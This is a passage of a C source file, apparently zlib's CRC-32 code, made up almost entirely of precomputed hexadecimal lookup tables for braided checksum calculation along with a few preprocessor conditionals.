0xb4d0fd7f, 0xa10ebf78, 0x9f657d97, 0x9cde4a7c, 0xa2b58893, 0xdbae5471, 0xe5c5969e, 0xe67ea175, 0xd815639a, 0x554e686b, 0x6b25aa84, 0x689e9d6f, 0x56f55f80, 0x2fee8362, 0x1185418d, 0x123e7666, 0x2c55b489, 0x498f115f, 0x77e4d3b0, 0x745fe45b, 0x4a3426b4, 0x332ffa56, 0x0d4438b9, 0x0eff0f52, 0x3094cdbd, 0xbdcfc64c, 0x83a404a3, 0x801f3348, 0xbe74f1a7, 0xc76f2d45, 0xf904efaa, 0xfabfd841, 0xc4d41aae, 0x710de237, 0x4f6620d8, 0x4cdd1733, 0x72b6d5dc, 0x0bad093e, 0x35c6cbd1, 0x367dfc3a, 0x08163ed5, 0x854d3524, 0xbb26f7cb, 0xb89dc020, 0x86f602cf, 0xffedde2d, 0xc1861cc2, 0xc23d2b29, 0xfc56e9c6, 0x998c4c10, 0xa7e78eff, 0xa45cb914, 0x9a377bfb, 0xe32ca719, 0xdd4765f6, 0xdefc521d, 0xe09790f2, 0x6dcc9b03, 0x53a759ec, 0x501c6e07, 0x6e77ace8, 0x176c700a, 0x2907b2e5, 0x2abc850e, 0x14d747e1}, {0x00000000, 0xc0df8ec1, 0xc1b96c58, 0x0166e299, 0x8273d9b0, 0x42ac5771, 0x43cab5e8, 0x83153b29, 0x45e1c3ba, 0x853e4d7b, 0x8458afe2, 0x44872123, 0xc7921a0a, 0x074d94cb, 0x062b7652, 0xc6f4f893, 0xcbc4f6ae, 0x0b1b786f, 0x0a7d9af6, 0xcaa21437, 0x49b72f1e, 0x8968a1df, 0x880e4346, 0x48d1cd87, 0x8e253514, 0x4efabbd5, 0x4f9c594c, 0x8f43d78d, 0x0c56eca4, 0xcc896265, 0xcdef80fc, 0x0d300e3d, 0xd78f9c86, 0x17501247, 0x1636f0de, 0xd6e97e1f, 0x55fc4536, 0x9523cbf7, 0x9445296e, 0x549aa7af, 0x926e5f3c, 0x52b1d1fd, 0x53d73364, 0x9308bda5, 0x101d868c, 0xd0c2084d, 0xd1a4ead4, 0x117b6415, 0x1c4b6a28, 0xdc94e4e9, 0xddf20670, 0x1d2d88b1, 0x9e38b398, 0x5ee73d59, 0x5f81dfc0, 0x9f5e5101, 0x59aaa992, 0x99752753, 0x9813c5ca, 0x58cc4b0b, 0xdbd97022, 0x1b06fee3, 0x1a601c7a, 0xdabf92bb, 0xef1948d6, 0x2fc6c617, 0x2ea0248e, 0xee7faa4f, 0x6d6a9166, 0xadb51fa7, 0xacd3fd3e, 0x6c0c73ff, 0xaaf88b6c, 0x6a2705ad, 0x6b41e734, 0xab9e69f5, 0x288b52dc, 0xe854dc1d, 0xe9323e84, 0x29edb045, 0x24ddbe78, 0xe40230b9, 0xe564d220, 0x25bb5ce1, 0xa6ae67c8, 0x6671e909, 0x67170b90, 0xa7c88551, 0x613c7dc2, 0xa1e3f303, 0xa085119a, 0x605a9f5b, 0xe34fa472, 0x23902ab3, 0x22f6c82a, 0xe22946eb, 0x3896d450, 0xf8495a91, 0xf92fb808, 0x39f036c9, 0xbae50de0, 0x7a3a8321, 0x7b5c61b8, 0xbb83ef79, 0x7d7717ea, 0xbda8992b, 0xbcce7bb2, 0x7c11f573, 0xff04ce5a, 0x3fdb409b, 0x3ebda202, 0xfe622cc3, 0xf35222fe, 0x338dac3f, 0x32eb4ea6, 0xf234c067, 0x7121fb4e, 0xb1fe758f, 0xb0989716, 0x704719d7, 0xb6b3e144, 0x766c6f85, 0x770a8d1c, 0xb7d503dd, 0x34c038f4, 0xf41fb635, 0xf57954ac, 0x35a6da6d, 0x9f35e177, 0x5fea6fb6, 0x5e8c8d2f, 0x9e5303ee, 0x1d4638c7, 0xdd99b606, 0xdcff549f, 0x1c20da5e, 0xdad422cd, 0x1a0bac0c, 0x1b6d4e95, 0xdbb2c054, 0x58a7fb7d, 0x987875bc, 0x991e9725, 0x59c119e4, 0x54f117d9, 0x942e9918, 0x95487b81, 0x5597f540, 0xd682ce69, 0x165d40a8, 0x173ba231, 0xd7e42cf0, 0x1110d463, 0xd1cf5aa2, 0xd0a9b83b, 0x107636fa, 0x93630dd3, 0x53bc8312, 0x52da618b, 0x9205ef4a, 0x48ba7df1, 0x8865f330, 0x890311a9, 0x49dc9f68, 0xcac9a441, 0x0a162a80, 0x0b70c819, 0xcbaf46d8, 0x0d5bbe4b, 0xcd84308a, 0xcce2d213, 0x0c3d5cd2, 0x8f2867fb, 0x4ff7e93a, 0x4e910ba3, 0x8e4e8562, 0x837e8b5f, 0x43a1059e, 0x42c7e707, 0x821869c6, 0x010d52ef, 0xc1d2dc2e, 0xc0b43eb7, 0x006bb076, 0xc69f48e5, 0x0640c624, 0x072624bd, 0xc7f9aa7c, 0x44ec9155, 0x84331f94, 0x8555fd0d, 0x458a73cc, 0x702ca9a1, 0xb0f32760, 0xb195c5f9, 0x714a4b38, 0xf25f7011, 0x3280fed0, 0x33e61c49, 0xf3399288, 0x35cd6a1b, 0xf512e4da, 0xf4740643, 0x34ab8882, 0xb7beb3ab, 0x77613d6a, 0x7607dff3, 0xb6d85132, 0xbbe85f0f, 0x7b37d1ce, 0x7a513357, 0xba8ebd96, 0x399b86bf, 0xf944087e, 0xf822eae7, 0x38fd6426, 0xfe099cb5, 0x3ed61274, 0x3fb0f0ed, 0xff6f7e2c, 0x7c7a4505, 0xbca5cbc4, 0xbdc3295d, 0x7d1ca79c, 0xa7a33527, 0x677cbbe6, 0x661a597f, 0xa6c5d7be, 0x25d0ec97, 0xe50f6256, 0xe46980cf, 0x24b60e0e, 0xe242f69d, 0x229d785c, 0x23fb9ac5, 0xe3241404, 0x60312f2d, 0xa0eea1ec, 0xa1884375, 0x6157cdb4, 0x6c67c389, 0xacb84d48, 0xaddeafd1, 0x6d012110, 0xee141a39, 0x2ecb94f8, 0x2fad7661, 0xef72f8a0, 0x29860033, 0xe9598ef2, 0xe83f6c6b, 0x28e0e2aa, 0xabf5d983, 0x6b2a5742, 0x6a4cb5db, 0xaa933b1a}, {0x00000000, 0x6f4ca59b, 0x9f9e3bec, 0xf0d29e77, 0x7f3b0603, 0x1077a398, 0xe0a53def, 0x8fe99874, 0xfe760c06, 0x913aa99d, 0x61e837ea, 0x0ea49271, 0x814d0a05, 0xee01af9e, 0x1ed331e9, 0x719f9472, 0xfced180c, 0x93a1bd97, 0x637323e0, 0x0c3f867b, 0x83d61e0f, 0xec9abb94, 0x1c4825e3, 0x73048078, 0x029b140a, 0x6dd7b191, 0x9d052fe6, 0xf2498a7d, 0x7da01209, 0x12ecb792, 0xe23e29e5, 0x8d728c7e, 0xf8db3118, 0x97979483, 0x67450af4, 0x0809af6f, 0x87e0371b, 0xe8ac9280, 0x187e0cf7, 0x7732a96c, 0x06ad3d1e, 0x69e19885, 0x993306f2, 0xf67fa369, 0x79963b1d, 0x16da9e86, 0xe60800f1, 0x8944a56a, 0x04362914, 0x6b7a8c8f, 0x9ba812f8, 0xf4e4b763, 0x7b0d2f17, 0x14418a8c, 0xe49314fb, 0x8bdfb160, 0xfa402512, 0x950c8089, 0x65de1efe, 0x0a92bb65, 0x857b2311, 0xea37868a, 0x1ae518fd, 0x75a9bd66, 0xf0b76330, 0x9ffbc6ab, 0x6f2958dc, 0x0065fd47, 0x8f8c6533, 0xe0c0c0a8, 0x10125edf, 0x7f5efb44, 0x0ec16f36, 0x618dcaad, 0x915f54da, 0xfe13f141, 0x71fa6935, 0x1eb6ccae, 0xee6452d9, 0x8128f742, 0x0c5a7b3c, 0x6316dea7, 0x93c440d0, 0xfc88e54b, 0x73617d3f, 0x1c2dd8a4, 0xecff46d3, 0x83b3e348, 0xf22c773a, 0x9d60d2a1, 0x6db24cd6, 0x02fee94d, 0x8d177139, 0xe25bd4a2, 0x12894ad5, 0x7dc5ef4e, 0x086c5228, 0x6720f7b3, 0x97f269c4, 0xf8becc5f, 0x7757542b, 0x181bf1b0, 0xe8c96fc7, 0x8785ca5c, 0xf61a5e2e, 0x9956fbb5, 0x698465c2, 0x06c8c059, 0x8921582d, 0xe66dfdb6, 0x16bf63c1, 0x79f3c65a, 0xf4814a24, 0x9bcdefbf, 0x6b1f71c8, 0x0453d453, 0x8bba4c27, 0xe4f6e9bc, 0x142477cb, 0x7b68d250, 0x0af74622, 0x65bbe3b9, 0x95697dce, 0xfa25d855, 0x75cc4021, 0x1a80e5ba, 0xea527bcd, 0x851ede56, 0xe06fc760, 0x8f2362fb, 0x7ff1fc8c, 0x10bd5917, 0x9f54c163, 0xf01864f8, 0x00cafa8f, 0x6f865f14, 0x1e19cb66, 0x71556efd, 0x8187f08a, 0xeecb5511, 0x6122cd65, 0x0e6e68fe, 0xfebcf689, 0x91f05312, 0x1c82df6c, 0x73ce7af7, 0x831ce480, 0xec50411b, 0x63b9d96f, 0x0cf57cf4, 0xfc27e283, 0x936b4718, 0xe2f4d36a, 0x8db876f1, 0x7d6ae886, 0x12264d1d, 0x9dcfd569, 0xf28370f2, 0x0251ee85, 0x6d1d4b1e, 0x18b4f678, 0x77f853e3, 0x872acd94, 0xe866680f, 0x678ff07b, 0x08c355e0, 0xf811cb97, 0x975d6e0c, 0xe6c2fa7e, 0x898e5fe5, 0x795cc192, 0x16106409, 0x99f9fc7d, 0xf6b559e6, 0x0667c791, 0x692b620a, 0xe459ee74, 0x8b154bef, 0x7bc7d598, 0x148b7003, 0x9b62e877, 0xf42e4dec, 0x04fcd39b, 0x6bb07600, 0x1a2fe272, 0x756347e9, 0x85b1d99e, 0xeafd7c05, 0x6514e471, 0x0a5841ea, 0xfa8adf9d, 0x95c67a06, 0x10d8a450, 0x7f9401cb, 0x8f469fbc, 0xe00a3a27, 0x6fe3a253, 0x00af07c8, 0xf07d99bf, 0x9f313c24, 0xeeaea856, 0x81e20dcd, 0x713093ba, 0x1e7c3621, 0x9195ae55, 0xfed90bce, 0x0e0b95b9, 0x61473022, 0xec35bc5c, 0x837919c7, 0x73ab87b0, 0x1ce7222b, 0x930eba5f, 0xfc421fc4, 0x0c9081b3, 0x63dc2428, 0x1243b05a, 0x7d0f15c1, 0x8ddd8bb6, 0xe2912e2d, 0x6d78b659, 0x023413c2, 0xf2e68db5, 0x9daa282e, 0xe8039548, 0x874f30d3, 0x779daea4, 0x18d10b3f, 0x9738934b, 0xf87436d0, 0x08a6a8a7, 0x67ea0d3c, 0x1675994e, 0x79393cd5, 0x89eba2a2, 0xe6a70739, 0x694e9f4d, 0x06023ad6, 0xf6d0a4a1, 0x999c013a, 0x14ee8d44, 0x7ba228df, 0x8b70b6a8, 0xe43c1333, 0x6bd58b47, 0x04992edc, 0xf44bb0ab, 0x9b071530, 0xea988142, 0x85d424d9, 0x7506baae, 0x1a4a1f35, 0x95a38741, 0xfaef22da, 0x0a3dbcad, 0x65711936}}; #endif #endif #if N == 4 #if W == 8 local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0xf1da05aa, 0x38c50d15, 0xc91f08bf, 0x718a1a2a, 0x80501f80, 0x494f173f, 0xb8951295, 0xe3143454, 0x12ce31fe, 0xdbd13941, 0x2a0b3ceb, 0x929e2e7e, 0x63442bd4, 0xaa5b236b, 0x5b8126c1, 0x1d596ee9, 0xec836b43, 0x259c63fc, 0xd4466656, 0x6cd374c3, 0x9d097169, 0x541679d6, 0xa5cc7c7c, 0xfe4d5abd, 0x0f975f17, 0xc68857a8, 0x37525202, 0x8fc74097, 0x7e1d453d, 0xb7024d82, 0x46d84828, 0x3ab2ddd2, 0xcb68d878, 0x0277d0c7, 0xf3add56d, 0x4b38c7f8, 0xbae2c252, 0x73fdcaed, 0x8227cf47, 0xd9a6e986, 0x287cec2c, 0xe163e493, 0x10b9e139, 0xa82cf3ac, 0x59f6f606, 0x90e9feb9, 0x6133fb13, 0x27ebb33b, 0xd631b691, 0x1f2ebe2e, 0xeef4bb84, 0x5661a911, 0xa7bbacbb, 0x6ea4a404, 0x9f7ea1ae, 0xc4ff876f, 0x352582c5, 0xfc3a8a7a, 0x0de08fd0, 0xb5759d45, 0x44af98ef, 0x8db09050, 0x7c6a95fa, 0x7565bba4, 0x84bfbe0e, 0x4da0b6b1, 0xbc7ab31b, 0x04efa18e, 0xf535a424, 0x3c2aac9b, 0xcdf0a931, 0x96718ff0, 0x67ab8a5a, 0xaeb482e5, 0x5f6e874f, 0xe7fb95da, 0x16219070, 0xdf3e98cf, 0x2ee49d65, 0x683cd54d, 0x99e6d0e7, 0x50f9d858, 0xa123ddf2, 0x19b6cf67, 0xe86ccacd, 0x2173c272, 0xd0a9c7d8, 0x8b28e119, 0x7af2e4b3, 0xb3edec0c, 0x4237e9a6, 0xfaa2fb33, 0x0b78fe99, 0xc267f626, 0x33bdf38c, 0x4fd76676, 0xbe0d63dc, 0x77126b63, 0x86c86ec9, 0x3e5d7c5c, 0xcf8779f6, 0x06987149, 0xf74274e3, 0xacc35222, 0x5d195788, 0x94065f37, 0x65dc5a9d, 0xdd494808, 0x2c934da2, 0xe58c451d, 0x145640b7, 0x528e089f, 0xa3540d35, 0x6a4b058a, 0x9b910020, 0x230412b5, 0xd2de171f, 0x1bc11fa0, 0xea1b1a0a, 0xb19a3ccb, 0x40403961, 0x895f31de, 0x78853474, 0xc01026e1, 0x31ca234b, 0xf8d52bf4, 0x090f2e5e, 0xeacb7748, 0x1b1172e2, 0xd20e7a5d, 0x23d47ff7, 0x9b416d62, 0x6a9b68c8, 0xa3846077, 0x525e65dd, 0x09df431c, 0xf80546b6, 0x311a4e09, 0xc0c04ba3, 0x78555936, 0x898f5c9c, 0x40905423, 0xb14a5189, 0xf79219a1, 0x06481c0b, 0xcf5714b4, 0x3e8d111e, 0x8618038b, 0x77c20621, 0xbedd0e9e, 0x4f070b34, 0x14862df5, 0xe55c285f, 0x2c4320e0, 0xdd99254a, 0x650c37df, 0x94d63275, 0x5dc93aca, 0xac133f60, 0xd079aa9a, 0x21a3af30, 0xe8bca78f, 0x1966a225, 0xa1f3b0b0, 0x5029b51a, 0x9936bda5, 0x68ecb80f, 0x336d9ece, 0xc2b79b64, 0x0ba893db, 0xfa729671, 0x42e784e4, 0xb33d814e, 0x7a2289f1, 0x8bf88c5b, 0xcd20c473, 0x3cfac1d9, 0xf5e5c966, 0x043fcccc, 0xbcaade59, 0x4d70dbf3, 0x846fd34c, 0x75b5d6e6, 0x2e34f027, 0xdfeef58d, 0x16f1fd32, 0xe72bf898, 0x5fbeea0d, 0xae64efa7, 0x677be718, 0x96a1e2b2, 0x9faeccec, 0x6e74c946, 0xa76bc1f9, 0x56b1c453, 0xee24d6c6, 0x1ffed36c, 0xd6e1dbd3, 0x273bde79, 0x7cbaf8b8, 0x8d60fd12, 0x447ff5ad, 0xb5a5f007, 0x0d30e292, 0xfceae738, 0x35f5ef87, 0xc42fea2d, 0x82f7a205, 0x732da7af, 0xba32af10, 0x4be8aaba, 0xf37db82f, 0x02a7bd85, 0xcbb8b53a, 0x3a62b090, 0x61e39651, 0x903993fb, 0x59269b44, 0xa8fc9eee, 0x10698c7b, 0xe1b389d1, 0x28ac816e, 0xd97684c4, 0xa51c113e, 0x54c61494, 0x9dd91c2b, 0x6c031981, 0xd4960b14, 0x254c0ebe, 0xec530601, 0x1d8903ab, 0x4608256a, 0xb7d220c0, 0x7ecd287f, 0x8f172dd5, 0x37823f40, 0xc6583aea, 0x0f473255, 0xfe9d37ff, 0xb8457fd7, 0x499f7a7d, 0x808072c2, 0x715a7768, 0xc9cf65fd, 0x38156057, 0xf10a68e8, 0x00d06d42, 0x5b514b83, 0xaa8b4e29, 0x63944696, 0x924e433c, 0x2adb51a9, 0xdb015403, 0x121e5cbc, 0xe3c45916}, {0x00000000, 0x0ee7e8d1, 0x1dcfd1a2, 0x13283973, 0x3b9fa344, 0x35784b95, 0x265072e6, 0x28b79a37, 0x773f4688, 0x79d8ae59, 0x6af0972a, 0x64177ffb, 0x4ca0e5cc, 0x42470d1d, 0x516f346e, 0x5f88dcbf, 0xee7e8d10, 0xe09965c1, 0xf3b15cb2, 0xfd56b463, 0xd5e12e54, 0xdb06c685, 0xc82efff6, 0xc6c91727, 0x9941cb98, 0x97a62349, 0x848e1a3a, 0x8a69f2eb, 0xa2de68dc, 0xac39800d, 0xbf11b97e, 0xb1f651af, 0x078c1c61, 0x096bf4b0, 0x1a43cdc3, 0x14a42512, 0x3c13bf25, 0x32f457f4, 0x21dc6e87, 0x2f3b8656, 0x70b35ae9, 0x7e54b238, 0x6d7c8b4b, 0x639b639a, 0x4b2cf9ad, 0x45cb117c, 0x56e3280f, 0x5804c0de, 0xe9f29171, 0xe71579a0, 0xf43d40d3, 0xfadaa802, 0xd26d3235, 0xdc8adae4, 0xcfa2e397, 0xc1450b46, 0x9ecdd7f9, 0x902a3f28, 0x8302065b, 0x8de5ee8a, 0xa55274bd, 0xabb59c6c, 0xb89da51f, 0xb67a4dce, 0x0f1838c2, 0x01ffd013, 0x12d7e960, 0x1c3001b1, 0x34879b86, 0x3a607357, 0x29484a24, 0x27afa2f5, 0x78277e4a, 0x76c0969b, 0x65e8afe8, 0x6b0f4739, 0x43b8dd0e, 0x4d5f35df, 0x5e770cac, 0x5090e47d, 0xe166b5d2, 0xef815d03, 0xfca96470, 0xf24e8ca1, 0xdaf91696, 0xd41efe47, 0xc736c734, 0xc9d12fe5, 0x9659f35a, 0x98be1b8b, 0x8b9622f8, 0x8571ca29, 0xadc6501e, 0xa321b8cf, 0xb00981bc, 0xbeee696d, 0x089424a3, 0x0673cc72, 0x155bf501, 0x1bbc1dd0, 0x330b87e7, 0x3dec6f36, 0x2ec45645, 0x2023be94, 0x7fab622b, 0x714c8afa, 0x6264b389, 0x6c835b58, 0x4434c16f, 0x4ad329be, 0x59fb10cd, 0x571cf81c, 0xe6eaa9b3, 0xe80d4162, 0xfb257811, 0xf5c290c0, 0xdd750af7, 0xd392e226, 0xc0badb55, 0xce5d3384, 0x91d5ef3b, 0x9f3207ea, 0x8c1a3e99, 0x82fdd648, 0xaa4a4c7f, 0xa4ada4ae, 0xb7859ddd, 0xb962750c, 0x1e307184, 0x10d79955, 0x03ffa026, 0x0d1848f7, 0x25afd2c0, 0x2b483a11, 0x38600362, 0x3687ebb3, 0x690f370c, 0x67e8dfdd, 0x74c0e6ae, 0x7a270e7f, 0x52909448, 0x5c777c99, 0x4f5f45ea, 0x41b8ad3b, 0xf04efc94, 0xfea91445, 0xed812d36, 0xe366c5e7, 0xcbd15fd0, 0xc536b701, 0xd61e8e72, 0xd8f966a3, 0x8771ba1c, 0x899652cd, 0x9abe6bbe, 0x9459836f, 0xbcee1958, 0xb209f189, 0xa121c8fa, 0xafc6202b, 0x19bc6de5, 0x175b8534, 0x0473bc47, 0x0a945496, 0x2223cea1, 0x2cc42670, 0x3fec1f03, 0x310bf7d2, 0x6e832b6d, 0x6064c3bc, 0x734cfacf, 0x7dab121e, 0x551c8829, 0x5bfb60f8, 0x48d3598b, 0x4634b15a, 0xf7c2e0f5, 0xf9250824, 0xea0d3157, 0xe4ead986, 0xcc5d43b1, 0xc2baab60, 0xd1929213, 0xdf757ac2, 0x80fda67d, 0x8e1a4eac, 0x9d3277df, 0x93d59f0e, 0xbb620539, 0xb585ede8, 0xa6add49b, 0xa84a3c4a, 0x11284946, 0x1fcfa197, 0x0ce798e4, 0x02007035, 0x2ab7ea02, 0x245002d3, 0x37783ba0, 0x399fd371, 0x66170fce, 0x68f0e71f, 0x7bd8de6c, 0x753f36bd, 0x5d88ac8a, 0x536f445b, 0x40477d28, 0x4ea095f9, 0xff56c456, 0xf1b12c87, 0xe29915f4, 0xec7efd25, 0xc4c96712, 0xca2e8fc3, 0xd906b6b0, 0xd7e15e61, 0x886982de, 0x868e6a0f, 0x95a6537c, 0x9b41bbad, 0xb3f6219a, 0xbd11c94b, 0xae39f038, 0xa0de18e9, 0x16a45527, 0x1843bdf6, 0x0b6b8485, 0x058c6c54, 0x2d3bf663, 0x23dc1eb2, 0x30f427c1, 0x3e13cf10, 0x619b13af, 0x6f7cfb7e, 0x7c54c20d, 0x72b32adc, 0x5a04b0eb, 0x54e3583a, 0x47cb6149, 0x492c8998, 0xf8dad837, 0xf63d30e6, 0xe5150995, 0xebf2e144, 0xc3457b73, 0xcda293a2, 0xde8aaad1, 0xd06d4200, 0x8fe59ebf, 0x8102766e, 0x922a4f1d, 0x9ccda7cc, 0xb47a3dfb, 0xba9dd52a, 0xa9b5ec59, 0xa7520488}, {0x00000000, 0x3c60e308, 0x78c1c610, 0x44a12518, 0xf1838c20, 0xcde36f28, 0x89424a30, 0xb522a938, 0x38761e01, 0x0416fd09, 0x40b7d811, 0x7cd73b19, 0xc9f59221, 0xf5957129, 0xb1345431, 0x8d54b739, 0x70ec3c02, 0x4c8cdf0a, 0x082dfa12, 0x344d191a, 0x816fb022, 0xbd0f532a, 0xf9ae7632, 0xc5ce953a, 0x489a2203, 0x74fac10b, 0x305be413, 0x0c3b071b, 0xb919ae23, 0x85794d2b, 0xc1d86833, 0xfdb88b3b, 0xe1d87804, 0xddb89b0c, 0x9919be14, 0xa5795d1c, 0x105bf424, 0x2c3b172c, 0x689a3234, 0x54fad13c, 0xd9ae6605, 0xe5ce850d, 0xa16fa015, 0x9d0f431d, 0x282dea25, 0x144d092d, 0x50ec2c35, 0x6c8ccf3d, 0x91344406, 0xad54a70e, 0xe9f58216, 0xd595611e, 0x60b7c826, 0x5cd72b2e, 0x18760e36, 0x2416ed3e, 0xa9425a07, 0x9522b90f, 0xd1839c17, 0xede37f1f, 0x58c1d627, 0x64a1352f, 0x20001037, 0x1c60f33f, 0x18c1f649, 0x24a11541, 0x60003059, 0x5c60d351, 0xe9427a69, 0xd5229961, 0x9183bc79, 0xade35f71, 0x20b7e848, 0x1cd70b40, 0x58762e58, 0x6416cd50, 0xd1346468, 0xed548760, 0xa9f5a278, 0x95954170, 0x682dca4b, 0x544d2943, 0x10ec0c5b, 0x2c8cef53, 0x99ae466b, 0xa5cea563, 0xe16f807b, 0xdd0f6373, 0x505bd44a, 0x6c3b3742, 0x289a125a, 0x14faf152, 0xa1d8586a, 0x9db8bb62, 0xd9199e7a, 0xe5797d72, 0xf9198e4d, 0xc5796d45, 0x81d8485d, 0xbdb8ab55, 0x089a026d, 0x34fae165, 0x705bc47d, 0x4c3b2775, 0xc16f904c, 0xfd0f7344, 0xb9ae565c, 0x85ceb554, 0x30ec1c6c, 0x0c8cff64, 0x482dda7c, 0x744d3974, 0x89f5b24f, 0xb5955147, 0xf134745f, 0xcd549757, 0x78763e6f, 0x4416dd67, 0x00b7f87f, 0x3cd71b77, 0xb183ac4e, 0x8de34f46, 0xc9426a5e, 0xf5228956, 0x4000206e, 0x7c60c366, 0x38c1e67e, 0x04a10576, 0x3183ec92, 0x0de30f9a, 0x49422a82, 0x7522c98a, 0xc00060b2, 0xfc6083ba, 0xb8c1a6a2, 0x84a145aa, 0x09f5f293, 0x3595119b, 0x71343483, 0x4d54d78b, 0xf8767eb3, 0xc4169dbb, 0x80b7b8a3, 0xbcd75bab, 0x416fd090, 0x7d0f3398, 0x39ae1680, 0x05cef588, 0xb0ec5cb0, 0x8c8cbfb8, 0xc82d9aa0, 0xf44d79a8, 0x7919ce91, 0x45792d99, 0x01d80881, 0x3db8eb89, 0x889a42b1, 0xb4faa1b9, 0xf05b84a1, 0xcc3b67a9, 0xd05b9496, 0xec3b779e, 0xa89a5286, 0x94fab18e, 0x21d818b6, 0x1db8fbbe, 0x5919dea6, 0x65793dae, 0xe82d8a97, 0xd44d699f, 0x90ec4c87, 0xac8caf8f, 0x19ae06b7, 0x25cee5bf, 0x616fc0a7, 0x5d0f23af, 0xa0b7a894, 0x9cd74b9c, 0xd8766e84, 0xe4168d8c, 0x513424b4, 0x6d54c7bc, 0x29f5e2a4, 0x159501ac, 0x98c1b695, 0xa4a1559d, 0xe0007085, 0xdc60938d, 0x69423ab5, 0x5522d9bd, 0x1183fca5, 0x2de31fad, 0x29421adb, 0x1522f9d3, 0x5183dccb, 0x6de33fc3, 0xd8c196fb, 0xe4a175f3, 0xa00050eb, 0x9c60b3e3, 0x113404da, 0x2d54e7d2, 0x69f5c2ca, 0x559521c2, 0xe0b788fa, 0xdcd76bf2, 0x98764eea, 0xa416ade2, 0x59ae26d9, 0x65cec5d1, 0x216fe0c9, 0x1d0f03c1, 0xa82daaf9, 0x944d49f1, 0xd0ec6ce9, 0xec8c8fe1, 0x61d838d8, 0x5db8dbd0, 0x1919fec8, 0x25791dc0, 0x905bb4f8, 0xac3b57f0, 0xe89a72e8, 0xd4fa91e0, 0xc89a62df, 0xf4fa81d7, 0xb05ba4cf, 0x8c3b47c7, 0x3919eeff, 0x05790df7, 0x41d828ef, 0x7db8cbe7, 0xf0ec7cde, 0xcc8c9fd6, 0x882dbace, 0xb44d59c6, 0x016ff0fe, 0x3d0f13f6, 0x79ae36ee, 0x45ced5e6, 0xb8765edd, 0x8416bdd5, 0xc0b798cd, 0xfcd77bc5, 0x49f5d2fd, 0x759531f5, 0x313414ed, 0x0d54f7e5, 0x800040dc, 0xbc60a3d4, 0xf8c186cc, 0xc4a165c4, 0x7183ccfc, 0x4de32ff4, 0x09420aec, 0x3522e9e4}, {0x00000000, 0x6307d924, 0xc60fb248, 0xa5086b6c, 0x576e62d1, 0x3469bbf5, 0x9161d099, 0xf26609bd, 0xaedcc5a2, 0xcddb1c86, 0x68d377ea, 0x0bd4aece, 0xf9b2a773, 0x9ab57e57, 0x3fbd153b, 0x5cbacc1f, 0x86c88d05, 0xe5cf5421, 0x40c73f4d, 0x23c0e669, 0xd1a6efd4, 0xb2a136f0, 0x17a95d9c, 0x74ae84b8, 0x281448a7, 0x4b139183, 0xee1bfaef, 0x8d1c23cb, 0x7f7a2a76, 0x1c7df352, 0xb975983e, 0xda72411a, 0xd6e01c4b, 0xb5e7c56f, 0x10efae03, 0x73e87727, 0x818e7e9a, 0xe289a7be, 0x4781ccd2, 0x248615f6, 0x783cd9e9, 0x1b3b00cd, 0xbe336ba1, 0xdd34b285, 0x2f52bb38, 0x4c55621c, 0xe95d0970, 0x8a5ad054, 0x5028914e, 0x332f486a, 0x96272306, 0xf520fa22, 0x0746f39f, 0x64412abb, 0xc14941d7, 0xa24e98f3, 0xfef454ec, 0x9df38dc8, 0x38fbe6a4, 0x5bfc3f80, 0xa99a363d, 0xca9def19, 0x6f958475, 0x0c925d51, 0x76b13ed7, 0x15b6e7f3, 0xb0be8c9f, 0xd3b955bb, 0x21df5c06, 0x42d88522, 0xe7d0ee4e, 0x84d7376a, 0xd86dfb75, 0xbb6a2251, 0x1e62493d, 0x7d659019, 0x8f0399a4, 0xec044080, 0x490c2bec, 0x2a0bf2c8, 0xf079b3d2, 0x937e6af6, 0x3676019a, 0x5571d8be, 0xa717d103, 0xc4100827, 0x6118634b, 0x021fba6f, 0x5ea57670, 0x3da2af54, 0x98aac438, 0xfbad1d1c, 0x09cb14a1, 0x6acccd85, 0xcfc4a6e9, 0xacc37fcd, 0xa051229c, 0xc356fbb8, 0x665e90d4, 0x055949f0, 0xf73f404d, 0x94389969, 0x3130f205, 0x52372b21, 0x0e8de73e, 0x6d8a3e1a, 0xc8825576, 0xab858c52, 0x59e385ef, 0x3ae45ccb, 0x9fec37a7, 0xfcebee83, 0x2699af99, 0x459e76bd, 0xe0961dd1, 0x8391c4f5, 0x71f7cd48, 0x12f0146c, 0xb7f87f00, 0xd4ffa624, 0x88456a3b, 0xeb42b31f, 0x4e4ad873, 0x2d4d0157, 0xdf2b08ea, 0xbc2cd1ce, 0x1924baa2, 0x7a236386, 0xed627dae, 0x8e65a48a, 0x2b6dcfe6, 0x486a16c2, 0xba0c1f7f, 0xd90bc65b, 0x7c03ad37, 0x1f047413, 0x43beb80c, 0x20b96128, 0x85b10a44, 0xe6b6d360, 0x14d0dadd, 0x77d703f9, 0xd2df6895, 0xb1d8b1b1, 0x6baaf0ab, 0x08ad298f, 0xada542e3, 0xcea29bc7, 0x3cc4927a, 0x5fc34b5e, 0xfacb2032, 0x99ccf916, 0xc5763509, 0xa671ec2d, 0x03798741, 0x607e5e65, 0x921857d8, 0xf11f8efc, 0x5417e590, 0x37103cb4, 0x3b8261e5, 0x5885b8c1, 0xfd8dd3ad, 0x9e8a0a89, 0x6cec0334, 0x0febda10, 0xaae3b17c, 0xc9e46858, 0x955ea447, 0xf6597d63, 0x5351160f, 0x3056cf2b, 0xc230c696, 0xa1371fb2, 0x043f74de, 0x6738adfa, 0xbd4aece0, 0xde4d35c4, 0x7b455ea8, 0x1842878c, 0xea248e31, 0x89235715, 0x2c2b3c79, 0x4f2ce55d, 0x13962942, 0x7091f066, 0xd5999b0a, 0xb69e422e, 0x44f84b93, 0x27ff92b7, 0x82f7f9db, 0xe1f020ff, 0x9bd34379, 0xf8d49a5d, 0x5ddcf131, 0x3edb2815, 0xccbd21a8, 0xafbaf88c, 0x0ab293e0, 0x69b54ac4, 0x350f86db, 0x56085fff, 0xf3003493, 0x9007edb7, 0x6261e40a, 0x01663d2e, 0xa46e5642, 0xc7698f66, 0x1d1bce7c, 0x7e1c1758, 0xdb147c34, 0xb813a510, 0x4a75acad, 0x29727589, 0x8c7a1ee5, 0xef7dc7c1, 0xb3c70bde, 0xd0c0d2fa, 0x75c8b996, 0x16cf60b2, 0xe4a9690f, 0x87aeb02b, 0x22a6db47, 0x41a10263, 0x4d335f32, 0x2e348616, 0x8b3ced7a, 0xe83b345e, 0x1a5d3de3, 0x795ae4c7, 0xdc528fab, 0xbf55568f, 0xe3ef9a90, 0x80e843b4, 0x25e028d8, 0x46e7f1fc, 0xb481f841, 0xd7862165, 0x728e4a09, 0x1189932d, 0xcbfbd237, 0xa8fc0b13, 0x0df4607f, 0x6ef3b95b, 